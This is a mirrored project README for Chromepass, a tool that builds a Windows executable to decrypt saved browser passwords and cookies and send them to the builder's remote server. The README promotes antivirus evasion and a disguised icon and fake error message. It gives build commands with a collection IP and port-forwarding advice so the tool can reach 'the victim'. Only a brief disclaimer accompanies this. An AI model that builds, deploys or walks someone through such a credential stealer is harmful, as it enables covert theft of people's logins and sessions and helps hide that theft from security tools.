Giter VIP home page Giter VIP logo

chromepass's Introduction

Chromepass - Hacking Chrome Saved Passwords and Cookies

Release Build Status on CircleCI
Scrutinizer code quality (GitHub/Bitbucket)
GitHub issues GitHub closed issues

View Demo · Report Bug · Request Feature

Table of Contents

About The project

Chromepass is a python-based console application that generates a windows executable with the following features:

  • Decrypt Google Chrome, Chromium, Edge, Brave, Opera and Vivaldi saved paswords and cookies
  • Send a file with the login/password combinations and cookies remotely (http server)
  • Undetectable by AV if done correctly
  • Custom icon
  • Custom error message
  • Customize port

AV Detection!

The new client build methodology, practically ensures a 0% detection rate, even without AV-evasion tactics. If this becomes false in the future, some methods will be implemented to improve AV evasion.

An example of latest scans:

Getting started

Dependencies and Requirements

This is a very simple application, which uses only:

  • Python - Tested on python 3.9+

It recommended to perform the installation inside a Windows VM. Some parts of the installation procedure might be affected by existing configurations. This was tested on a clean Windows 10 VM.

Installation

Chromepass requires Windows to run! Support for linux and macOS may be added soon.

Clone the repository:

git clone https://github.com/darkarp/chromepass

Install the dependencies:

Open an Admin powershell window and navigate to the chromepass folder.

python create.py --setup

If you're installing on clean VM or if you don't have the dependencies, this will take a long time. Go grab some coffee.

After the installation finished, make sure you close that powershell window and open a new one (doesn't need administrator privileges).

This will make sure the environment variables are refreshed.

Usage

Chromepass is very straightforward. Start by running:

python create.py -h

A list of options will appear and are self explanatory.

Running without any parameters will build the server and the client connecting to 127.0.0.1.

A simple example of a build:

python create.py --ip 92.34.11.220 --error --message An Error has happened

After creating the server and the client, make sure you're running the server when the client is ran.

The cookies and passwords will be saved in json files on a new folder called data in the same directory as the server, separated by ip address.

Remote Notes

If you'd like to use this in a remote scenario, you must also perform port forwarding (port 80 by default), so that when the victim runs the client it is able to connect to the server on the correct port.
For more general information, click here. If you're still not satisfied, perform a google search.

Manual dependency installation

The automated setup is experimental. For one reason or another, the setup might fail to correctly install the dependencies. If that's the case, you must install them manually.
Fortunately, there are only 2 dependencies:

  • Microsoft Visual C++ Build Tools 2015
  • Rustup

To install the build tools, you can either install Visual Studio Community Edition and during installation, select the build tools, or you can install it via Chocolatey. To install it via chocolatey, you must first follow the installation instructions on their website and then run the command choco install vcbuildtools.

After successfully installing the build tools, you can simply run the rustup-init.exe from Rustup's website.

This completes the required dependencies and after closing and reopening the powershell window, you'll be able to use ChromePass.

Errors, Bugs and feature requests

If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement please report it in the issue pages.

Please follow the templates shown when creating the issue.

Learn More

For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking

If you wish to contact me, you can do so via: [email protected]

Disclaimer

I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.

License

AGPL-3.0

Code Intelligence Status

chromepass's People

Contributors

darkarp avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.